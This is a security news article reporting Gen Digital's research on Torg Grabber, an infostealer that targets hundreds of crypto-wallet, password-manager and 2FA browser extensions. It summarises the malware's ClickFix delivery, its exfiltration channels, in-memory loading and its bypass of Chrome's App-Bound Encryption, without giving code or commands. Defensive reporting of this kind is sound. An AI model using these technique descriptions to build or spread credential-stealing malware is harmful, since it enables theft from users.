New Torg Grabber Infostealer Malware Targets 728 Cryptocurrency Wallets
By Bill Toulas | March 25, 2026
A newly identified information-stealing malware, dubbed Torg Grabber, is actively compromising a broad range of browser extensions—850 in total—including a striking 728 extensions related to cryptocurrency wallets. This sophisticated malware is designed to steal sensitive data from users’ devices, threatening the security of digital assets and personal information on an unprecedented scale.
How Torg Grabber Gains Access
Torg Grabber employs a novel infection technique known as ClickFix, which leverages clipboard hijacking to trick victims into running malicious PowerShell commands. This social engineering method enables the malware to silently infiltrate the targeted system without raising immediate suspicion.
According to cybersecurity researchers at Gen Digital, the threat is under active development. Between December 2025 and February 2026 alone, they discovered 334 unique Torg Grabber samples, with new command-and-control (C2) servers being registered weekly, indicating an expanding attacker infrastructure.
Extensive Data Theft Capabilities
Torg Grabber’s primary targets are browser extensions across 25 Chromium-based browsers and 8 Firefox variants. It attempts to extract a wide range of credentials including passwords, cookies, and autofill data. Of particular concern is the malware’s focus on cryptocurrency wallets—covering nearly every popular wallet extension:
- MetaMask
- Phantom
- Trust Wallet
- Coinbase Wallet
- Binance Chain Wallet
- Exodus
- TronLink
- Ronin Wallet
- OKX Wallet
- Keplr
- Rabby
- Sui Wallet
- Solflare
Researchers note that beyond the well-known names, the malware targets an extensive array of less popular, niche wallets, amplifying its potential impact.
In addition to wallets, Torg Grabber steals information from 103 password manager and two-factor authentication extensions such as:
- LastPass
- 1Password
- Bitwarden
- KeePass
- NordPass
- Dashlane
- ProtonPass
- Enpass
- Psono
- Pleasant Password Server
- heylogin
- 2FAAuth
- Google Authenticator (GAuth)
- TOTP Authenticator
- Akamai MFA
The malware’s reach also extends to popular communication and utility apps including Discord, Telegram, Steam, various VPNs, FTP clients, email software, and desktop cryptocurrency wallet applications.
Advanced Technical Features and Rapid Evolution
Gen Digital’s analysis highlights several sophisticated evasion and data exfiltration techniques employed by Torg Grabber:
- Initially, exfiltration used Telegram protocols, later shifting to a custom encrypted TCP variant.
- By late December 2025, these methods were replaced by HTTPS connections routed through Cloudflare, facilitating stealthier data transfers.
- The malware features multi-layered obfuscation, anti-analysis mechanisms, and executes its payload fully in-memory through direct syscalls and reflective loading to evade detection.
- On December 22, 2025, Torg Grabber evolved to bypass App-Bound Encryption (ABE), undermining cookie protection in Chrome and other Chromium browsers.
- A companion tool known as Underground was identified—this DLL injector accesses Chrome’s COM Elevation Service to extract the master encryption key, a technique also observed in other malware such as VoidStealer.
Further capabilities include host profiling, hardware fingerprinting, enumerating installed software (notably 24 antivirus products), taking desktop screenshots, and stealing files located in Desktop and Documents folders. The malware can even execute encrypted shellcode payloads delivered from its command-and-control servers.
Ongoing Threat and Expanding Actor Base
Torg Grabber is a rapidly evolving threat, with its operator base growing steadily. By the time of Gen Digital’s report, 40 unique operator tags had been documented, and new C2 domains continue to emerge weekly.
Cybersecurity professionals are urged to remain vigilant and to monitor for suspicious clipboard activity, unrecognized browser extension behavior, and atypical network traffic indicative of malware communication. Users are also advised to keep their browsers and security software up to date and to exercise caution when running scripts or commands suggested by unsolicited messages or clipboard content.
For detailed insights into Torg Grabber’s behavior and mitigation strategies, see the full technical report by Gen Digital. Staying informed and proactive is crucial in preventing data breaches and protecting digital assets in this increasingly hostile cyber landscape.
About the Author:
Bill Toulas is a seasoned tech writer and information security news reporter with over ten years of experience covering malware, data breaches, and cybersecurity developments.
For more updates on cybersecurity threats and best practices, subscribe to our newsletter and follow our ongoing coverage.